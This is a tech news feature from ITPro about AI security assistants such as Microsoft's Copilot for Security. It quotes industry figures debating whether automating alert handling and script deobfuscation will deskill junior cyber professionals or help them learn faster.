AI security tools promise to supercharge productivity, but experts worry cyber pros could become too reliant
AI security tools will deliver a boost by automating tasks that frequently bog down cyber professionals, but some industry experts worry teams could become too reliant on these systems
As AI seeps into every corner of the tech sector and beyond, a wave of security tools have flooded the market, promising to simplify cyber operations for enterprises and practitioners.
A significant part of the value-proposition vendors are trying to make with AI security assistants is that companies can free up swamped security teams by automating the more mundane, repetitive tasks in their workflow.
Many of the latest security assistants unveiled by Microsoft, Cisco, Check Point, and others can automate tasks that used to bog down workers, such as organizing the overwhelming stream of alerts security teams deal with every day.
Research from Mandiant in 2023 specifically highlighted “information overload” as a key barrier to effective threat intelligence. It’s an issue that plagues security teams across the industry, the company said, and one that contributes to staff burnout and poorer performance.
In theory, AI security tools should allow security staff to focus on critical tasks that require a human’s attention. Research from Censornet, for example, found 49% of SMBs think AI will boost their cyber defenses by freeing up security teams to proactively investigate risks.
After announcing its Copilot for Security would be rolled out to general availability from 1 April 2024, Microsoft claimed its assistant could carry out documentation tasks - a common pain point for security teams - 46% faster than a human and with greater accuracy.
Another task security professionals often get bogged down with is manually reverse engineering obfuscated scripts. Attackers will obfuscate the scripts employed in their attack chain in order to conceal their methods and keep victims in the dark.
Get the ITPro. daily newsletter
Receive our latest news, industry updates, featured resources and more. Sign up today to receive our FREE report on AI cyber crime & security - newly updated for 2024.
With skills gaps plaguing the security sector, finding security staff who have the expertise and experience to manually decode these scripts is becoming an uphill task for businesses.
Microsoft, naturally, said its tool will unlock huge productivity gains by enabling junior security analysts to reverse engineer said scripts without having to constantly consult senior colleagues.
No longer reliant on their more knowledgeable senior colleagues, junior security staff will be able to use AI assistants to take on tasks that might have previously been above their skill level, but what does this actually mean for their development?
By virtue of forgoing the process of learning from senior staff who might divulge handy tricks-of-the-trade or identify knowledge gaps in new team members, are the skill levels of new cyber professionals going to suffer as a result of these new security copilots?
Do teams risk becoming reliant on AI security tools?
Speaking to ITPro, Jeff Watkins, chief product and technology officer at xDesign, said the benefits AI adoption can bring to cyber security are clear, specifically in terms of automation.
“If there’s one field that has a huge potential for AI adoption, outside of the blindingly obvious customer support/CRM, it’s cyber security”, he explained.
“From attack analysis and simulations to reverse engineering and adaptive countermeasures, there’s a lot of potential in the area to intelligently automate processes and content generation. In many ways, this is a good thing, given the size of most security teams, as even in a well resourced organization there’s usually one security professional per 100 developers/technologists.”
But concerns around skills erosion are legitimate, Watkins noted, citing the digital amnesia associated with ‘The Google Effect’ and a worst-case scenario where underskilled cyber professionals are toothless to address sophisticated new attacks.
“There’s a number of important factors in AI adoption in the context of cyber security, the first of which is analogous to ‘The Google Effect’. With too much AI assistance, there’s a chance that security engineers could end up relying entirely on how to leverage the AI assistant over actually learning how to problem solve themselves,” he warned.
“This has greater potential for impact in an organization that uses AI tooling in lieu of a good mentorship and pairing/shadowing approach.”
“The nightmare scenario is that cyber security allows itself to become deskilled in organizations, meaning innovative new threats leave the team feeling helpless to problem-solve their way out of the situation.”
AI is no cyber “silver bullet”, but it could actually help cyber skills
Chris Stouff, chief strategy officer at Armor Defense, told ITPro it’s important businesses recognize the proficiencies and limitations of AI assistants, highlighting the continued importance of a robust, human-led security operations center (SOC).
“I think the representation of AI as a cyber security ‘silver bullet’ is a dangerous one. Whilst I agree its use will be beneficial for things like the automation of repetitive security tasks, what concerns me is the inference that AI, like some of the security products and services hailed before it, could become a standalone solution which will somehow negate the requirement for an effective Security Operations Center (SOC).”
Stouff explained why AI is not the panacea that struggling security leaders might hope for, lacking a human’s situational awareness, judgment, and ability to prioritize tasks.
Mike Isbitski, director of Cybersecurity Strategy at monitoring suite Sysdig, echoed these thoughts, and cautioned against exaggerating the effect AI will have on skill levels among cyber professionals.
Isbitski noted that, long-term, AI assistants could actually help junior team members improve skills.
"Concerns about security teams becoming complacent with overuse of AI to do their work are overblown,” he said.
“The rapid adoption of generative AI is akin to calculators and computers becoming pervasive in the classrooms over the past few decades. It's an inevitability, and generative AI is yet another powerful tool. The technology should be embraced as it'll allow junior practitioners to skill up faster and security programs to scale appropriately in order to mitigate advanced threats."
Solomon Klappholz is a Staff Writer at ITPro. He has experience writing about the technologies that facilitate industrial manufacturing which led to him developing a particular interest in IT regulation, industrial infrastructure applications, and machine learning.